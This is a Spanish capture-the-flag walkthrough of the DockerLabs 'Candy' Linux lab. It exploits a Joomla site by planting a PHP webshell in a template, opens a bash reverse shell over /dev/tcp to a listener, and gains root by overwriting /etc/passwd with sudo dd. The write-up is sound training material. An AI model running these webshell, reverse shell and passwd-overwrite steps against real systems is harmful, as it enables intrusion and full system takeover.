Máquina: Candy
SO: Linux
Nivel: Facil
DockerLabs


1. Descubrimos los puertos abiertos de la maquina; tenemos solo el puerto 80 abierto y nos reporta el robots.txt activo.

sudo nmap -p- --open -T5 --min-rate=5000 -sCV -n -Pn 172.17.0.2

img

2. En la web tenemos un panel login, si vemos el codigo fuente podemos ver que corre joomla como gestor de contenido.

http://172.17.0.2/

img img

3. Podemos usar la herramienta joomscan, pero en este caso veamos el robots.txt; vemos el directorio del administrador y al final tenemos unas credenciales , esto tambien lo podemos ver en la ruta /un_caramelo.

http://172.17.0.2/robots.txt

img img

4. Para identificar el hash la contraseña de admin podemos usar hash_identifier, ya sabiendo que es base64 procedemos a decodearlo.

echo "c2FubHVpczEyMzQ1" | base64 -d ; echo

img img

5. Vamos al panel administrativo de joomla y accedemos con las credenciales; una vez dentro vamos a system -> site_templates -> cassiopeia details and files.

http://172.17.0.2/administrator/

img img

6. Editamos el index.php le agregamos nuestro codigo para obtener un webshell.

system($_GET['cmd']);

img img

7. Nos ponemos en escucha con nc, procedemos a enviarnos la reverse shell; ya tendriamos la conexion exitosa.

nc -nlvp 4000

bash -c "bash -i >%26 /dev/tcp/192.168.18.8/4000 0>%261"

img img

8. Encontramos este fichero donde tenemos las creds para ingresar aparentemente a la bd, pero esto no funciona. Lo que si funciona es migrar al usuario luisillo.

cat /var/backups/hidden/otro_caramelo.txt

su luisillo

img img

9. Ahora escalamos a root aprovechando que tenemos un binario SUID. Echa un ojo en gtfobins.

sudo -l

img

9.1- Hacemos una copia de passwd para modificar su contenido, antes generamos una contraseña

cat /etc/passwd > backuppasswd

openssl passwd

img

9.2- Editamos el backuppasswd y sustituimos la x por la nueva contraseña de root

nano backuppasswd

img img

9.3- Hacemos uso del binario dd para sobreescribir el passwd con las nuevas modificaciones; vemos que ya se modifico

cat backuppasswd | sudo /bin/dd of=/etc/passwd

grep root /etc/passwd

img

9.4- Por ultimo migramos a root con la nueva contraseña generada

su root

img


Finalizado.